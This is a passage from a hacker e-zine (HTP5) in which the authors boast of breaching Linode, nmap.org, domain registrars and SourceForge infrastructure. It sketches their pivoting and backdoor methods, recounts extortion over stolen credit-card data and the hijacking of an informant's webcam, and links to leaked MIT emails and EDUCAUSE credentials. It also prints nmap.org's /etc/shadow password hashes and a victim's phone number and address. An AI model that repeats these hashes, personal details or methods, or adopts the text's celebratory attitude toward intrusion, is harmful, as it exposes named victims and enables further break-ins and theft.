internal Juniper routers as superusers: only 3 networks away and not even phys  
sep. Nothing proxychains can't handle. They probably should've checked their    
netscreens before it was too late. :P                                           
                                                                                
None of this access was ever used, but we did get to see some pretty funny      
shit. In the backbone of SourceForge (Savvis), for example, we ran into some    
old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key  
auth, and the kernels were fairly ancient (and in the absence of all file       
transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's 
served from port 43 - no file editing required). As it turns out, we were not   
the first ones there. On their Phoenix, AZ stats server, some random hacker was 
kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On  
SourceForge's backbone -- LOL? We don't think he fully realized what he had     
breached. Or maybe he just really needed a psyBNC server. Either way, he'll     
probably have to end up getting a new psyBNC after today. On Github or          
something.                                                                      
                                                                                
Enjoy the MIT emails/EDUCAUSE login data, included in this segment of           
HTP5:                                                                           
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip                   
|- 2.6GB | Zip compressed MIT emails                                            
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt            
|- 28MB  | EDUCAUSE database: extracted domain credentials                      
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip      
|- 12MB  | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup      
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt          
|- 143K  | EDUCAUSE domain passwords, allow account/DNS modification.           
|        | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt                      
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄


▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░  ░     ░░  
▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒     ░░░░░░░░░░░ ░░░░    ░░░░ 
▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░                      ░░░░░░░░░░ ░  
▓▓███▓▓▒███▄░▀▄▄  ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░                                ░░░░░▄▄▄▄▀▀
▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒    ░░░░░░        ░    ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓
▒▒▓▓██████████▓▓▓▒▄▄  ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀  ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████
▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████
▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████
▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███
▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒  ▓███▒░░▒███▓
▒▒░▒██▒▓██████   ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████   ▒████▓░░▓▓▓▓▒
░▒░░▓█░░▒▒▓██▓   ░░░░ ░███████████████████▒░ ▄  ▄▄  ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░
░░░░▒█░░░░▒▓▓░░     ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░   
░   ░█▒  ░░▒▒░░      ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓   ▓██████▓░░ ▓    
░░   █▒    ▒▒         ░░░░▓█████████▒▒▒░░░░░░░░  ░░░░░░░▒███▒▒▒███████▓  ░ ▓    
 ░░░ ▓▒  ▒ ░▒           ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░    ░░  ░░░  ▒▓▓▓▓▓███▓▒▒ ░░ ▓    
 ░   ▓▒  ▒▒ ▒▒░            ░░░░░░░░░░░░░░░░░          ░░                ░ ▒▓    
  ░ ░░▓  ░░ ░▒░░                   ░░  ░░░░░░        ░░░     ░░░░░  ░  ░▒ ▒     
   ░░ ▓    ░░▒▒░░                  ░░ ░░░░░          ░░░░              ░▒ ▓     
     ░▓      ░▒▒░░                ░░░ ░░      ░░░ ░░    ░              ▒ ▒░     
      ▓▒    ░░▒▒░░░              ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀  ░             ▒ ▒      
      ▒▓░░░░░░▒▒▒░░░░           ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░            ░▒ ▓      
      ▒▓  ░░  ░▒▒░░░░░         ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░        ░▒ █░      
       ▓░     ░▒▓▒░░░░░       ░░░▒▒▓▓▒▒▒▒▒▒▒░░     ░ ░░░▒▒▒██▒░    ░░▒░▒▒       
       ▒▓     ░▒▓▓▒▒░░░░      ░░▒▒▒▒▒░░░░    ░░░░░░░░░ ░░ ░▒▓█▒    ░▒▒░▓        
       ▒▓     ░ ▒▒▒▒▒░░░      ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒   ░▒▒▒▒▒        
        ▒▒    ░   ▒▒▒░░░░     ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░  ░░▒▒░▒         
        ▒▓    ░   ▒▒▒▒▒▒░░    ░▒▒░░░░  ░░░░          ░ ░░░  ░▒▒ ░░▒▒░ ▒         
         ▒▒   ░    ▒▒▒▓▒▒░░    ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒         
          ▓▒░▒░░   ░▒▒▓▓▒▒░░    ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒          
        ░▒▓▓▒▒▒▒▒   ░▒▒▓▓▓▒▒░░░░░▒▓▒░  ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░         
      ░▒▒▒▓▓▒▒▒▓▒░   ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░        
    ░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░   ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░    
  ░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░   ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒   ░▒▒▒▒▒░░░░░░ 
 ░▒▒▒▒    ▒▒▓█▒▒▓▒░ ░ ░   ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░  ░▒▒▒▒▒▒░  ░░░
▒▒▒▒░     ▒▒▒▒▓▒▓▓▒░   ░   ░░▒▓▓█████████▓▓▓▓███████████████▓▒░    ░▒▒▒▒▒▒░     
▒▒░       ▒▒▒▒▒█▓▓▒▒        ░░▒▒▒██████████████████████████▓▒▒      ▒▒▒▒▒▒▒░░   
▒        ░░░▒▒▒▓██▒▒▒ ░   ░    ░▒▒▒▓█████████████████████▓▒▒░ ░    ▒▒▒▒▒▒░░░ ░  
░    ░   ░░░░▒▒▒▒▓█▒▒░░░        ░░░▒▒██████████████████▓▓▒▒░ ░    ░▒▒▒▒░░░░░ ░░ 
░    ░  ░░░  ▒▒▒▒▒▒▓▓▒░░     ░     ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░       ░░▒▒▒░░░░░ ░░░░
░    ░░░░░░  ░▒▒▒▒▒▒▒▓▒ ░            ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░      ░░░▒▒▒▒░░░░ ░░░░░
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                                                      "I'm positive they owned."
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

   ▄▄    ▄▄  ▄▄  ▄▄  ▄▄▄▄▄  ▄▄▄▄   ▄▄▄▄                                         
   ██    ██  ███▄██  ██ ██  ██ ██  ██▄▄                                     HTP5
   ██    ██  ██ ▀██  ██▄██  ██▄█▀  ██▄▄                                         
   ██ ▄▄ ▄▄                                                                     
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
* Before reading this section of HTP5, we recommend you pop some popcorn.       
                                                                                
Following HTP4, we were promptly attacked by the next set of skids looking to   
get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided 
to take an alternative route, and located us through the development of one of  
our botnets, Zodiac. We quickly switched into a fallback network and found out  
they used SwiftIRC. SwiftIRC's nameservers were none other than Linode.         
                                                                                
Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell  
stored in their PHPBB MySQL database? if so -- you've finally been expunged ;)  
- HTP                                                                           
                                                                                
Linode turned out to be safe from our null RDS pass 1day (before Adobe had      
released their critical advisory). In the meantime, their registrar (name.com)  
was taken out. We acquired their domain login (along with StackOverflow,        
DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins.    
                                                                                
Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned.    
Back in November, we hinted at Huawei access in our Symantec release. Their     
registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P 
                                                                                
However, right in time, our very own HTP zeroday research division manifested   
subzero.py: a zeroday giving us a direct route into Linode. We proceeded to     
breach Linode and acquire their in-memory keys. This allowed us to download     
Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+       
init=/bin/bash.                                                                 
                                                                                
Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket,      
Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5, 
Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and     
xnite were customers, but that's getting into another story.                    
                                                                                
Unknown to us at the time, the FBI had successfully accessed HTP. They made     
their presence obvious, as everything we would get was burned within a few days.
However, we merely considered it to be a leak, and waited to use Linode itself  
to identify the source.                                                         
                                                                                
Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly  
identifying themselves as the source of the leaks within HTP. We still          
considered it a leak, and told Linode that if they did not act upon our         
already-gained access by 5/1, we would shred all of our Linode-related data.    
This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH      
usernames, plaintext LiSH passwords, and employee logins. In the case of        
noncompliance, we stated that we would drop it all in our release.              
                                                                                
This was actually quite a good offer. We made it because we didn't care about   
CCs to begin with (that's directed at everyone on Twitter blaming Linode for    
identity theft) and because our primary target was SwiftIRC, not Linode. They   
accepted to protect their customer data/CCs (there wasn't much choice).         
                                                                                
The FBI got pissed off by this development and forced Linode's hand. After      
informing them we would follow through and shred all of our Linode data within a
week, the FBI and Linode coordinated a release detailing the breach in an email 
to their customers. We were confused. If they just did this on 5/1, nothing     
would be affected? Apparently, the FBI did not trust us. We soon found out      
Linode's situation was not voluntary.                                           
                                                                                
Linode was between a rock and a hard place. They had to comply with the FBI     
(immediately), but doing so would mean all 159,000+ customers would be on Full  
Disclosure by 5/1. Recognizing their situation, we instead told them that if    
they acknowledged HTP in their analysis, we'd go ahead and shred their customer 
data anyway. Readily enabling carders was never part of our plan. They agreed,  
and we proceeded to delete our copies of the data for them.                     
                                                                                
There was one more loose end to tie. We identified which users on HTP were      
involved with the FBI, and promptly gained access to one of their cams. Sure    
enough, there was a handler standing behind him, monitoring his involvement     
in HTP (hi!).                                                                   
                                                                                
The FBI lost their access into HTP.                                             
                                                                                
So what's in this release, if not Linode? EDIT: Hahaha we guess that was too    
hot, we'll give you guys registrar data instead.                                
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png                         
|- 193K | Linode blog post screenshot 1                                         
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png                         
|- 179K | Linode blog post screenshot 2                                         
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt               
|- 70K | Data on the registars mentioned above.                                 
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄


                                                                                
                                                                                
                                                   ░░░░                         
                                         ░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░                  
                                      ░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░              
                                   ░░▒▒▒▒░░               ░░░▒▒░░▒░░            
                                ░░░░░▒░░                     ░░▒▒░░░▒░          
                              ░░░░░▒░░░                        ░░▒░░░░░░        
                            ░░░▒░▒░▒░░                          ░▒▒░░░░▒░░      
                          ░░░░▒▒▒░▓▒░▒░                         ░░▒░░░░░░▒░     
                        ░░░░░░▓█▓█▓▒░░░                        ░░▒░░░░░░░░▒░    
                      ░░░░░░▒▓████▓▒▒░░                ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░   
                    ░░░░░░░▒▒███▓▓░░░         ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░  
                  ░░░░░░▒▒░░░▓█▓▒░▒          ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░  
                 ░░░░░░▒▒░▒▒▒░▒▓▒░           ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░ 
               ░░░░░░░░░░▓▓▒▓▒░░░           ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░ 
              ░░░░░░░░▒░▒░░░▒▓▒░░          ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░ 
             ░░░░░░░░░░▒▒░░▓█▓▒░         ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░  
             ░░░░░░░░░░░▒░▒▒▓░░░░       ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░  
            ░░░░░░░░░░░▒░░▒▒▒░░░░░░  ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░   
           ░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░   
          ░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░    
         ░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░    
       ░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░    
    ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░    
  ░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░     
░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░      
░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░       
░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░        
░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░         
░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░           
░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░            
▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░             
░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░              
▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░               
░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░                
░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░                 
▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░                 
░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░                  
░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░                  
▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░                  
▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░                 
▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░                 
░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░                
░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░              
░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░             
░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░            
 ░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░          
         ░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░        
                   ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░       
                                                              ░░░░░░░░░░        
"You have to let it all go. Fear, doubt, and disbelief."                        
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
   ▄▄    ▄▄  ▄▄   ▄▄  ▄▄▄▄▄  ▄▄▄▄                                               
   ███▄  ██  ██▀▄▀██  ██ ██  ██ ██                                          HTP5
   ██ ▀█▄██  ██ ▀ ██  ██▀██  ██▀▀                                               
   ██   ▀██  ██   ██  ██ ██  ██              Whoa. Did we just backdoor Trinity?
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
Access to nmap.org (Insecure) was gained through Linode, which also included    
svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy- 
shit mode beginning when we were backdooring it. We decided to withhold the     
private releases, including DARPA CINDER Nmap, and release to you the unabridged
contents of the /home/ directory including those of Fyodor (Gordon Lyon) and    
David Fifield. Before we drop you into nmap.com, though, here's their           
/etc/shadow for those curious:                                                  
                                                                                
[root@web etc]# cat shadow                                                      
root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7:::                      
bin:*:14746:0:99999:7:::                                                        
daemon:*:14746:0:99999:7:::                                                     
adm:*:14746:0:99999:7:::                                                        
lp:*:14746:0:99999:7:::                                                         
sync:*:14746:0:99999:7:::                                                       
shutdown:*:14746:0:99999:7:::                                                   
halt:*:14746:0:99999:7:::                                                       
mail:*:14746:0:99999:7:::                                                       
news:*:14746:0:99999:7:::                                                       
uucp:*:14746:0:99999:7:::                                                       
operator:*:14746:0:99999:7:::                                                   
games:*:14746:0:99999:7:::                                                      
gopher:*:14746:0:99999:7:::                                                     
ftp:*:14746:0:99999:7:::                                                        
nobody:*:14746:0:99999:7:::                                                     
vcsa:!!:14746:0:99999:7:::                                                      
ntp:!!:14746::::::                                                              
sshd:!!:14746::::::                                                             
fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7:::                    
david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7:::                     
xfs:!!:14782::::::                                                              
apache:!!:14782::::::                                                           
web:!!:14782:0:99999:7:::                                                       
postfix:!!:14782::::::                                                          
webalizer:!!:14783::::::                                                        
mysql:!!:14896::::::                                                            
postgres:!!:14897::::::                                                         
distcache:!!:14924::::::                                                        
pcap:!!:15615::::::                                                             
mailman:!!:15666::::::                                                          
                                                                                
Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES.   
By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it
a spin.                                                                         
                                                                                
AMIS - Adversary Mission Identification System                                  
==============================================                                  
The Adversary Mission Identification System (AMIS) is a computer program        
that analyzes logs of network scans and reports possible signs of an            
adversary mission.                                                              
The AMIS is designed to work with the logs produced by the Nmap Security        
Scanner. It is part of an overall defensive system that includes                
periodic scans and their analysis.                                              
The AMIS checks for these "tells" that may be signs of an insider               
mission:                                                                        
* Newly opened ports, particularly those of file servers (e.g. HTTP,            
  FTP, and P2P services).                                                       
* Differences in files shared by known file servers, including new              
  files, deleted files, and changes in file metadata.                           
* Security vulnerabilities in servers.                                          
                                                                                
Enjoy this section of HTP5.                                                     
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz                           
|- 16GB  | Nmap.org: /home/                                                     
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄



▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
<~REDACTED_1> lol                                                               
<~REDACTED_1> i got a dmca from cloudflare                                      
<INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has quit [Client exited]     
<~REDACTED_3> dmca?                                                             
<~REDACTED_3> whats copyrighted                                                 
<~REDACTED_1> Reporter's Name: Gordon Lyon                                      
<~REDACTED_1> Reporter's Email Address: gordon@insecure.com                     
<~REDACTED_1> Reporter's Title: CTO                                             
<~REDACTED_1> Reporter's Company Name: Insecure.Com LLC                         
<~REDACTED_1> Reporter's Telephone Number: 650-989-4206                         
<~REDACTED_1> Reporter's Address: 370 Altair Way #113 Sunnyvale, CA US          
<~REDACTED_1> Reported URLs:                                                    
<~REDACTED_1> http://straylig.ht/zines/htp5/0x03_nmap.txt                       
<~REDACTED_1> Original Work: They released 16GB of our copyrighted data         
which they stole. I don't know if copyright applies to our password file,       
which they stole and released on this page, but it certainly applies to our     
Adversary Mission Identification System described on the page.                  
<INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has joined #thegibson        
<INFO> mode/#thegibson [+a REDACTED_2] by chippy1337                            
<~REDACTED_3> well                                                              
<~REDACTED_3> that would fit the bill                                           
<~REDACTED_3> lets call him up                                                  
<~REDACTED_3> and take this                                                     
<~REDACTED_3> to internet court                                                 
<~REDACTED_3> im seriously considering                                          
<~REDACTED_3> printing this out                                                 
<~REDACTED_3> and framing it on my wall                                         
<~REDACTED_3> cuz im lolin so hard                                              
<~REDACTED_3> 'sorry, there is a minimum requirement of 20GB before DCMAs are   
considered admissable in Internet Court'                                        
<&REDACTED_4> "What's that? You say there's a hostage situation in your         
apartment?! We'll call the police right away, sir."                             
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
lol                                                                             
                                                                                


   ▄▄▄▄▄▄▄▄  ▄▄  ▄▄  ▄▄▄▄▄  ▄▄  ▄▄  ▄▄▄▄▄ ▄▄▄▄▄▄▄▄                              
   ██        ██  ██  ██     ██  ██  ██▄▄█    ██                             HTP5
   ██▄▄▄▄▄▄  ██▄▄██  ██▄▄▄  ██▄▄██  ██ ▀▄▄▄▄▄██▄▄▄                              
         ██                                                                     
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
"Sucuri is a company that offers a security service that detects unauthorized   
changes to network (cloud) assets, including web sites, DNS, Whois records, SSL 
certificates and others. It is also heavily used as an early warning system to  
detect Malware, Spam and other security issues on web sites and DNS hijacking." 
                                                                                
